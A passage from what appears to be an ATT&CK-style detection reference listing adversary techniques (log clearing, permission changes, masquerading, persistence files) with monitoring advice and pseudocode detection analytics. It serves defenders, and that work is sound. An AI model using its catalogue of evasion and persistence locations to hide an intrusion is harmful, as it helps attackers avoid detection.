cleared_logs = filter log_files where ((log_name = "Security") AND (event_id = "1100" OR event_id ="1102" OR event_id = "1104")) OR (log_name = "System" AND event_code = "104")

.002 Clear Linux or Mac System Logs

Monitor for unexpected deletion of a system log file, typically stored in /var/logs or /Library/Logs.

.003 Clear Command History

Monitor for unexpected deletion of a command history file, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history.

Analytic 1 : Deletion of command history files

suspicious_files = filter ProcessGuid, ProcessFilePath, UserName, FilePath where (event_id == "23" AND FilePath LIKE '%ConsoleHost_history.txt%') OR (event_id == "4663" AND FilePath LIKE '%ConsoleHost_history.txt%' AND ObjectType == "File" AND (UserAccessList LIKE '%1537%' OR UserAccessList LIKE '%DELETE%'))

.004 File Deletion

Monitor for unexpected deletion of files from the system

.008 Clear Mailbox Data

Monitor for deletion of generated artifacts on a host system, including logs or captured files such as quarantined emails.

On Windows 10, mail application data is stored in C:\Users\Username\AppData\Local\Comms\Unistore\data. On Linux, mail data is stored in /var/spool/mail or /var/mail. On macOS, mail data is stored in ~/Library/Mail.

.009 Clear Persistence

Monitor for a file that may delete or alter generated artifacts associated with persistence on a host system.

ICS T0872 Indicator Removal on Host

Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

Enterprise T1490 Inhibit System Recovery

The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

File: File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

Domain ID Name Detects
Enterprise T1548 Abuse Elevation Control Mechanism

Monitor the file system for files that have the setuid or setgid bits set. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).

.001 Setuid and Setgid

Monitor the file system for files that have the setuid or setgid bits set.

Enterprise T1554 Compromise Client Software Binary

Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment

Enterprise T1543 .003 Create or Modify System Process: Windows Service

Adversaries may modify the binary file for an existing service to achieve Persistence while potentially Defense Evasion. If a newly created or modified runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. A well-tuned baseline is essential to differentiating between benign and malicious service modifications. Look for events where a file was created and then later run as a service. In these cases, a new service has been created or the binary has been modified. Many programs, such as msiexec.exe, do these behaviors legitimately and can be used to help validate legitimate service creations/modifications.

Analytic 1 - Service Binary Modifications

legitimate_installers = ["C:\windows\system32\msiexec.exe", "C:\windows\syswow64\msiexec.exe", ...]

file_change = search File:Create,Modifyprocess = search Process:Createservice_process = filter processes where (parent_exe == "services.exe")modified_service = join (search, filter) where ( file_change.time < service_process.time and file_change.file_path == service_process.image_path)

modified_service = filter modified_service where (modified_service.file_change.image_path not in legitimate_installers)output modified_service

Enterprise T1565 Data Manipulation

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity

.003 Runtime Data Manipulation

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity

Enterprise T1546 Event Triggered Execution

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

.006 LC_LOAD_DYLIB Addition

Changes to binaries that do not line up with application updates or patches are also extremely suspicious.

Enterprise T1222 File and Directory Permissions Modification

Monitor and investigate attempts to modify ACLs and file/directory ownership.

.001 Windows File and Directory Permissions Modification

Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.

Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.

Windows environment logs can be noisy, so we take the following into consideration:

  • We need to exclude events generated by the local system (subject security ID "NT AUTHORITY\SYSTEM") and focus on actual user events.
  • When a permission modification is made for a folder, a new event log is generated for each subfolder and file under that folder. It is advised to group logs based on handle ID or user ID.
  • The Windows security log (event ID 4670) also includes information about the process that modifies the file permissions. It is advised to focus on uncommon process names, and it is also uncommon for real-users to perform this task without a GUI.
  • Pseudocode Event ID is for Windows Security Log (Event ID 4670 - Permissions on an object were changed).
  • Windows Event ID 4719 (An Attempt Was Made to Access An Object) can also be used to alert on changes to Active Directory audit policy for a system.

Linux environment logs can be more noisy than the Windows-specific implementation, although Linux does not generate logs for system triggered activities like in Windows. In addition, it may be necessary to whitelist cron jobs that regularly run and execute chmod.

Analytic 1 : Access Permission Modification for Windows

file_dacl_events = filter log_events where (event_id == "4670" ANDobject_type == "File" ANDsubject_security_id != "NT AUTHORITY\SYSTEM")

Analytic 2 - Access Permission Modification for Linux

chmod_processes = filter processes where command_line == "chmod *"

.002 Linux and Mac File and Directory Permissions Modification

Monitor and investigate attempts to modify ACLs and file/directory ownership. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.

Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.

Windows environment logs can be noisy, so we take the following into consideration:

  • We need to exclude events generated by the local system (subject security ID "NT AUTHORITY\SYSTEM") and focus on actual user events.
  • When a permission modification is made for a folder, a new event log is generated for each subfolder and file under that folder. It is advised to group logs based on handle ID or user ID.
  • The Windows security log (event ID 4670) also includes information about the process that modifies the file permissions. It is advised to focus on uncommon process names, and it is also uncommon for real-users to perform this task without a GUI.
  • Pseudocode Event ID is for Windows Security Log (Event ID 4670 - Permissions on an object were changed).
  • Windows Event ID 4719 (An Attempt Was Made to Access An Object) can also be used to alert on changes to Active Directory audit policy for a system.

Linux environment logs can be more noisy than the Windows-specific implementation, although Linux does not generate logs for system triggered activities like in Windows. In addition, it may be necessary to whitelist cron jobs that regularly run and execute chmod.

Analytic 1 : Access Permission Modification for Windows

file_dacl_events = filter log_events where (event_id == "4670" ANDobject_type == "File" ANDsubject_security_id != "NT AUTHORITY\SYSTEM")

Analytic 2 - Access Permission Modification for Linux

chmod_processes = filter processes where command_line == "chmod *"

Enterprise T1564 Hide Artifacts

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.

.001 Hidden Files and Directories

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions may set files and directories to be hidden to evade detection mechanisms.

.004 NTFS File Attributes

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, may use NTFS file attributes to hide their malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA. [16]

.007 VBA Stomping

If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.[17]

.009 Resource Forking

Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks.

Enterprise T1070 Indicator Removal

Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

.006 Timestomp

Monitor for file modifications that collects information on file handle opens and can compare timestamp values

ICS T0872 Indicator Removal on Host

Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

Enterprise T1570 Lateral Tool Transfer

Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.

ICS T0867 Lateral Tool Transfer

Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.

Enterprise T1036 Masquerading

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE".

Check and ensure that file headers/signature and extensions match using magic bytes detection and/or file signature validation.[18] In Linux, the file command may be used to check the file signature.[19]

.001 Invalid Code Signature

Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.

.002 Right-to-Left Override

Monitor for common formats of RTLO characters within filenames such as \u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.

.003 Rename System Utilities

Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity.

.005 Match Legitimate Name or Location

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.

.006 Space after Filename

Monitor for spaces at the end of file names, that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.

.007 Double File Extension

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

ICS T0849 Masquerading

Collect file hashes. Monitor for file names that do not match their expected hash. Perform file monitoring. Files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE". For added context on adversary procedures and background see Masquerading and applicable sub-techniques.

Enterprise T1027 Obfuscated Files or Information

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

File-based signatures may be capable of detecting code obfuscation depending on the methods used.[20][21][22]

.001 Binary Padding

Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.

.002 Software Packing

Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.

.003 Steganography

Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.

.004 Compile After Delivery

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

.007 Dynamic API Resolution

Depending on the method used to obfuscate API function calls, a file-based signature may be capable of detecting dynamical resolution.[20][21][22]

.008 Stripped Payloads

Detecting the presence of stripped payloads may be difficult and unwarranted in real-time, though analyzing contextual data about files (such as content and character entropy) may highlight attempts at obfuscation.

.009 Embedded Payloads

Monitor contextual data about a file that may highlight embedded payloads, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.

.010 Command Obfuscation

Scripts containing obfuscated content may have higher entropy of characters/strings.

.012 LNK Icon Smuggling

Monitor contextual data about a file that may highlight embedded malicious content, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.

Enterprise T1055 Process Injection

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

.013 Process Doppelgänging

Scan file objects reported during the PsSetCreateProcessNotifyRoutine, [23] which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. [24] Also consider comparing file objects loaded in memory to the corresponding file on disk. [25]

Enterprise T1553 Subvert Trust Controls

Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.

.001 Gatekeeper Bypass

Review false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag.

QuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed. [26]

.002 Code Signing

Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.

.005 Mark-of-the-Web Bypass

Monitor files (especially those downloaded from untrusted locations) for MOTW attributes. Also consider inspecting and scanning file formats commonly abused to bypass MOTW (ex: .arj, .gzip, .iso, .vhd).

Enterprise T1195 Supply Chain Compromise

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.

.001 Compromise Software Dependencies and Development Tools

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.

.002 Compromise Software Supply Chain

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.

ICS T0862 Supply Chain Compromise

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures.

Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.

File: File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

File: File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

Domain ID Name Detects
Enterprise T1548 Abuse Elevation Control Mechanism

On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called.

.001 Setuid and Setgid

Monitor for changes made to files that may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context.

.003 Sudo and Sudo Caching

On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.

Enterprise T1098 Account Manipulation

Monitor for changes made to files related to account settings, such as /etc/ssh/sshd_config and the authorized_keys file for each user on a system.

.004 SSH Authorized Keys

Monitor for changes made to detect changes made to the authorized_keys file for each user on a system. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.

Enterprise T1547 Boot or Logon Autostart Execution

Monitor for changes made to files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.

.001 Registry Run Keys / Startup Folder

Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. [27]

.006 Kernel Modules and Extensions

Monitor for changes made to files that may modify the kernel to automatically execute programs on system boot.

.007 Re-opened Applications

Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.

.008 LSASS Driver

Monitor for changes made to files that may modify or add LSASS drivers to obtain persistence on compromised systems.

.009 Shortcut Modification

Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.

.013 XDG Autostart Entries

Malicious XDG autostart entries may be detected by auditing file modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.

.015 Login Items

All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.[9][10][11][12] These locations should be monitored and audited.

Enterprise T1037 Boot or Logon Initialization Scripts

Monitor for changes made to files that are modified by unusual accounts outside of normal administration duties.

.002 Login Hook

Monitor for changes to login hook files (/Library/Preferences/com.apple.loginwindow.plist), especially by unusual accounts outside of normal administration duties.

.003 Network Logon Script

Monitor for changes made to files for unexpected modifications to unusual accounts outside of normal administration duties

.004 RC Scripts

Monitor for changes made to files for unexpected modifications to RC scripts in the /etc/ directory

.005 Startup Items

Monitor for changes made to files for unexpected modifications to /Library/StartupItem folder

Enterprise T1554 Compromise Client Software Binary

Monitor changes to client software that do not correlate with known software or patch cycles.

Enterprise T1543 Create or Modify System Process

Monitor for changes to files associated with system-level processes.

.001 Launch Agent

Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.

.002 Systemd Service

Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links

.004 Launch Daemon

Monitor files for changes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.

Enterprise T1485 Data Destruction

Monitor for changes made to a large quantity of files for unexpected modifications in user directories and under C:\Windows\System32.

ICS T0809 Data Destruction

Monitor for changes made to a large quantity of files for unexpected modifications in both user directories and directories used to store programs and OS components (e.g., C:\Windows\System32).

Enterprise T1486 Data Encrypted for Impact

Monitor for changes made to files in user directories.

Enterprise T1565 Data Manipulation

Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity

.001 Stored Data Manipulation

Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity

.003 Runtime Data Manipulation

Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity

Enterprise T1491 Defacement

Monitor for changes made to files for unexpected modifications to internal and external websites for unplanned content changes.

.001 Internal Defacement

Monitor internal and websites for unplanned content changes.

.002 External Defacement

Monitor external websites for unplanned content changes.

Enterprise T1140 Deobfuscate/Decode Files or Information

Monitor for changes made to files for unexpected modifications that attempt to hide artifacts. On Windows, Event ID 4663 (Security Log - An attempt was made to access an object) can be used to alert on suspicious file accesses (e.g., attempting to write to a file which shouldn’t be further modified) that may coincide with attempts to hide artifacts.

Enterprise T1546 Event Triggered Execution

Monitor for changes made to files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.

.002 Screensaver

Monitor for changes made to files that may establish persistence by executing malicious content triggered by user inactivity.

Note: Although there are no standard events for file modification, Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted accesses of screensaver files (typically ending in a file extension of .scr).

.004 Unix Shell Configuration Modification

Monitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.[28]

.005 Trap

Monitor for changes made to files that may establish persistence by executing malicious content triggered by an interrupt signal.

.006 LC_LOAD_DYLIB Addition

Monitor file systems for changes to application binaries and invalid checksums/signatures.

.008 Accessibility Features

Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious.

.011 Application Shimming

Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.

.013 PowerShell Profile

Locations where profile.ps1 can be stored should be monitored for modifications. [13] Example profile locations include:* $PsHome\Profile.ps1* $PsHome\Microsoft.{HostProgram}_profile.ps1* $Home\My Documents\PowerShell\Profile.ps1* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1

.014 Emond

Monitor emond rules creation by checking for files modified in /etc/emond.d/rules/ and /private/var/db/emondClients.

Enterprise T1187 Forced Authentication

Monitor for changes made to the .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources

Enterprise T1564 Hide Artifacts

Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection.

.002 Hidden Users

Monitor for changes made to files that may use hidden users to mask the presence of user accounts they create or modify. Monitor for changes made to the /Library/Preferences/com.apple.loginwindow plist file for unexpected modifications to the Hide500Users key value on macOS.[29]

.003 Hidden Window

Monitor for changes made to files that may use hidden windows to conceal malicious activity from the plain sight of users. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.

.004 NTFS File Attributes

There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. [30] [31] [32] For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.

.005 Hidden File System

Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded.

.008 Email Hiding Rules

On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.[33]

Enterprise T1574 Hijack Execution Flow

Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.

.001 DLL Search Order Hijacking

Monitor for changed made to .manifest/.local redirection files, or file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious.

.002 DLL Side-Loading

Monitor for changes made to files for unexpected modifications to access permissions and attributes

.004 Dylib Hijacking

Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.

.005 Executable Installer File Permissions Weakness

Monitor for changes to binaries and service executables that may normally occur during software updates.

.006 Dynamic Linker Hijacking

Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.

.008 Path Interception by Search Order Hijacking

Monitor for programs metadata modifications such as deletion of the path to an executable since it makes programs vulnerable to this type of technique. Also, monitor modifications of files such as renaming programs using Windows system utilities names.

.009 Path Interception by Unquoted Path

Monitor for changes made to files that may execute their own malicious payloads by hijacking vulnerable file path references.

.010 Services File Permissions Weakness

Monitor for modification of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. Modification of files considers actions such as renaming and directory moving.

Enterprise T1562 Impair Defenses

Monitor changes made to configuration files that contain settings for logging and defensive tools.

.012 Disable or Modify Linux Audit System

Monitor changes made to the /etc/audit/audit.rules file containing the sequence of auditctl commands loaded at boot time.

Enterprise T1070 Indicator Removal

Monitor for changes made to a file may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

.002 Clear Linux or Mac System Logs

Monitor for changes made to system log files, typically stored in /var/log or /Library/Logs, for unexpected modifications to access permissions and attributes

.003 Clear Command History

Monitor for changes made to command history files, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history, for unexpected modifications to contents, access permissions, and attributes.

Analytic 1 : Modification of access rights to command history files

suspicious_files = filter ProcessGuid, ProcessFilePath, UserName, FilePath where (event_id == "4663" AND FilePath LIKE '%ConsoleHost_history.txt%' AND ObjectType == "File" AND (UserAccessList LIKE '%1539%' or UserAccessList LIKE '%WRITE_DAC%')) OR (event_id == "4670" AND FilePath LIKE '%ConsoleHost_history.txt%' AND ObjectType == "File" AND (ObjectNewSd LIKE '%;FA%' OR ObjectNewSd LIKE '%;FW%' OR ObjectNewSd LIKE '%;BU%'))

.006 Timestomp

Monitor for unexpected modifications to file timestamps

.007 Clear Network Connection History and Configurations

Monitor changes to files that may be indicators of deleting or altering malicious network configuration settings as well as generated artifacts on a host system that highlight network connection history, such as Default.rdp or /var/log/.

.008 Clear Mailbox Data

Monitor for changes made to generated artifacts on a host system, including logs or captured files such as quarantined emails.

On Windows 10, mail application data is stored in C:\Users\Username\AppData\Local\Comms\Unistore\data. On Linux, mail data is stored in /var/spool/mail or /var/mail. On macOS, mail data is stored in ~/Library/Mail.

.009 Clear Persistence

Monitor for changes made to a file may delete or alter generated artifacts associated with persistence on a host system.

ICS T0872 Indicator Removal on Host

Monitor for changes made to a file may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

Enterprise T1056 Input Capture

Monitor for changes made to files for unexpected modifications to access permissions and attributes

.003 Web Portal Capture

Monitor for changes made to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.

Enterprise T1036 Masquerading

Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted file accesses that may be associate with Masquerading.

.003 Rename System Utilities

Monitor for changes made to files for unexpected modifications to file names that are mismatched between the file name on disk and that of the binary's PE metadata. This is a likely indicator that a binary was renamed after it was compiled.

Note: There are no standard Windows events for file modification. However, Event ID 4663 (An attempt was made to access an object) can be used to audit and alert on attempts to access system utility binaries; the "Accesses" field can be used to filter by type of access (e.g., MODIFY vs DELETE).

.008 Masquerade File Type

Check and ensure that file headers/signature and extensions match using magic bytes detection and/or file signature validation.[18] In Linux, the file command may be used to check the file signature.[19]

ICS T0849 Masquerading

Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

Enterprise T1556 Modify Authentication Process

Monitor for suspicious modification of files associated with authentication processes, such as configuration files and module paths (e.g. /etc/pam.d/). Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. Also monitor for access to certificates and cryptographic keys material.

.001 Domain Controller Authentication

Monitor for changes to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).[34]

.003 Pluggable Authentication Modules

Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.

.004 Network Device Authentication

Monitor for changes made to the checksum of the operating system file and verifying the image of the operating system in memory.[35][36] Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as Modify System Image.

.007 Hybrid Identity

Monitor for suspicious modification of files associated with hybrid identity authentication processes, such as configuration files. Monitor for access to certificates and cryptographic keys material.

Enterprise T1601 Modify System Image

Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with  Patch System Image, it may be appropriate to also verify the integrity of the vendor provided operating system image file.

Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. [35]

Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  [36]

.001 Patch System Image

Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

.002 Downgrade System Image

Monitor for changes made to the operating system of a network device because image downgrade may be used in conjunction with  Patch System Image, it may be appropriate to also verify the integrity of the vendor provided operating system image file.

Enterprise T1137 Office Application Startup

Monitor for changes made to files that may leverage Microsoft Office-based applications for persistence between startups.

.001 Office Template Macros

Monitor for changes made to files that may abuse Microsoft Office templates to obtain persistence on a compromised system. Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated

.002 Office Test

Monitor for changes made to files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.

.006 Add-ins

Monitor for changes made to files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

Enterprise T1647 Plist File Modification

Monitor for plist file modification, especially if immediately followed by other suspicious events such as code execution from \~/Library/Scripts or \~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.

Enterprise T1653 Power Settings

Monitor for unexpected changes to configuration files associated with the power settings of a system.

Enterprise T1055 Process Injection

Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.

.009 Proc Memory

Monitor for changes made to /proc files that may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Users should not have permission to modify these in most cases.

ICS T0873 Project File Infection

Monitor for unexpected changes to project files, although if the malicious modification occurs in tandem with legitimate changes it will be difficult to isolate the unintended changes by analyzing only file systems modifications.

Enterprise T1014 Rootkit

Monitor for changes and the existence of unrecognized DLLs, drivers, devices, services, and to the MBR. [37]

Enterprise T1053 Scheduled Task/Job

Monitor for changes made to files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

.002 At

On Windows, monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks, especially those that do not correlate with known software, patch cycles, etc. On Linux and macOS, all at jobs are stored in /var/spool/cron/atjobs/.[38]

.003 Cron

Monitor for changes made to files for unexpected modifications to access permissions and attributes

.005 Scheduled Task

Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.

.006 Systemd Timers

